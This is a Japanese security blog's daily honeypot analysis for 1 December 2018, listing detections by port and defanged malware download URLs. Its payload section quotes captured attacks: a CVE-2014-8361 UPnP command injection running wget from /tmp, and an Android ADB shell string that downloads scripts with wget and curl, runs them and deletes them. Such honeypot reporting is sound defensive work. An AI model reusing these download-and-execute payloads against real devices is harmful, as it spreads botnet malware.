sec-chick Blog

サイバーセキュリティブログ

【ハニーポット】Honeytrap簡易分析(115日目:12/1)

ふと気がつくともう12月になっていた。社会人になるとあっと言う間に時間が過ぎて行きますね。。。。。

本日はこれと言った通信はなかったですが、12月1日の簡易分析となります。

Honeytrap簡易分析(115日目:12/1)
◾️送信元IPマッピング

f:id:one-chick-sec:20181203210613p:plain


◾️検知数グラフ

f:id:one-chick-sec:20181203210637p:plain検知数としては100件前後を途切れなく、検知していました。

◾️宛先ポート別

宛先ポート 検知数 サービス ペイロード
445 1970 SMB SMBrS@bPC NETWORK PROGRAM 1.0
81 78 UPnP GET login.cgi
2202 64 SSH SSH-2.0-libssh2_1.4.3
1433 62 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
8443 53 Tomcat? GET /nmaplowercheck1543605898
8080 50 PROXY GET / HTTP/1.1
3389 47 RDP Cookie: mstshash=hello
9200 34 ? -
9151 32 Elasticsearch -
6379 30 REDIS *1..$4..info


ポート 8443 で検知した通信はおそらく nmapによるものと推測されます。
使用用途としては TomcatHTTPS通信に使われるとの情報がありました。

◾️マルウェアダウンロード

宛先ポート マルウェアダウンロード先 検知数
52869 http://185[.]244[.]25[.]222/mips 9
52869 http://46[.]17[.]47[.]73/poof[.]mips 5
5555 http://207[.]148[.]64[.]177/a 1
5555 http://80[.]211[.]117[.]113/bc 1


新規のマルウェア検知はありませんでした。

ペイロード
宛先ポート:52869
CVE-2014-8361 の脆弱性を狙ったもの

POST /picsdesc.xml HTTP/1.1
~省略~
`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/mips `
</NewInternalClient><NewEnabled>1</NewEnabled>
~省略~

宛先ポート:5555
Android 端末の ADB ポートを狙ったもの

CNXN............2.......host::.OPEN9............C......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;echo lol.

以上となります。